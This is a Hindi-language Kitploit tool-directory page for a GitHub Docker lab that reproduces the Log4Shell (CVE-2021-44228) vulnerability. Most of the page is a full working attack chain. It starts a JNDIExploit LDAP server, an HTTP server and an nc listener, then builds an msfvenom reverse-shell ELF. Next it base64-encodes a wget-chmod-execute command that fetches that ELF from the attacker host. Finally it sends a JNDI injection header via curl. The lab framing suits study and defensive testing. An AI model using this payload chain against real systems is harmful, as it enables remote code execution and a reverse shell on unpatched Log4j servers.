Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Log4Shell-CVE-2021-44228-ENV — Log4Shell Docker Env | Kitploit
उपकरण/GitHubGitHub/ycdxsb/log4shell-cve-2021-44228-env
कंटेनर सुरक्षाभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणलर्निंग और शिक्षालैब और अभ्यास
GitHubycdxsb/log4shell-cve-2021-44228-env

Log4Shell-CVE-2021-44228-ENV

Log4Shell Docker Env

रिपॉजिटरी देखें
4144 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Log4Shell प्रतिकृति वातावरण

उदाहरण विवरण

हमलाग्रस्त मशीन IP: 47.47.47.47

हमलावर मशीन IP: 48.48.48.48

हमलाग्रस्त मशीन पर कमजोरी Docker चलाएँ

  • DockerFile का उपयोग करके Docker इमेज बनाएँ और चलाएँ:
root@kitploit:~
docker build . -t vuln
docker run -p 8080:8080 --name vuln vuln

हमलावर मशीन पर आक्रमण Docker चलाएँ

  • DockerFile का उपयोग करके Docker इमेज बनाएँ और चलाएँ
root@kitploit:~
docker build . -t attack
docker run -itd -p 9999:9999 -p 8888:8888 -p 1389:1389 -p 9000:9000 --name attack attack

हमलावर मशीन वातावरण तैयारी

तीन अलग-अलग शेल में कमांड निष्पादित करें, शेल को सक्रिय रखें

  • हमलावर मशीन पर JDNI सर्वर प्रारंभ करें
root@kitploit:~
docker exec -it attack /bin/bash
java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 48.48.48.48 -p 8888
  • हमलावर मशीन पर HTTP सर्वर प्रारंभ करें
root@kitploit:~
docker exec -it attack /bin/bash
python3 -m http.server 9999
  • हमलावर मशीन पर nc पोर्ट सुनना
root@kitploit:~
docker exec -it attack /bin/bash
nc -lvvp 9000

हमलावर मशीन द्वारा आक्रमण का कार्यान्वयन

एक ही शेल में कमांड निष्पादित करें

root@kitploit:~
docker exec -it attack /bin/bash
  • हमलावर मशीन पर रिवर्स शेल फ़ाइल तैयार करें
root@kitploit:~
msfvenom -p linux/x64/shell_reverse_tcp LHOST=48.48.48.48 LPORT=9000 -f elf -o /rev.elf
  • हमलावर मशीन पर पेलोड तैयार करें
root@kitploit:~
echo 'wget http://48.48.48.48:9999/rev.elf -O /tmp/rev.elf && chmod +x /tmp/rev.elf && /tmp/rev.elf' | base64
# d2dldCBodHRwOi8vNDguNDguNDguNDg6OTk5OS9yZXYuZWxmIC1PIC90bXAvcmV2LmVsZiAmJiBjaG1vZCAreCAvdG1wL3Jldi5lbGYgJiYgL3RtcC9yZXYuZWxmCg==
  • आक्रमण पेलोड भेजें
root@kitploit:~
curl 47.47.47.47:8080 -H 'X-Api-Version: ${jndi:ldap://48.48.48.48:1389/Basic/Command/Base64/d2dldCBodHRwOi8vNDguNDguNDguNDg6OTk5OS9yZXYuZWxmIC1PIC90bXAvcmV2LmVsZiAmJiBjaG1vZCAreCAvdG1wL3Jldi5lbGYgJiYgL3RtcC9yZXYuZWxmCg==}'

कमांड जनरेशन

root@kitploit:~
python3 command_gen.py vuln_ip attack_ip

वीडियो प्रदर्शन

वीडियो

संदर्भ

  • https://github.com/christophetd/log4shell-vulnerable-app
  • https://github.com/twseptian/Spring-Boot-Log4j-CVE-2021-44228-Docker-Lab
टूल डाउनलोड करें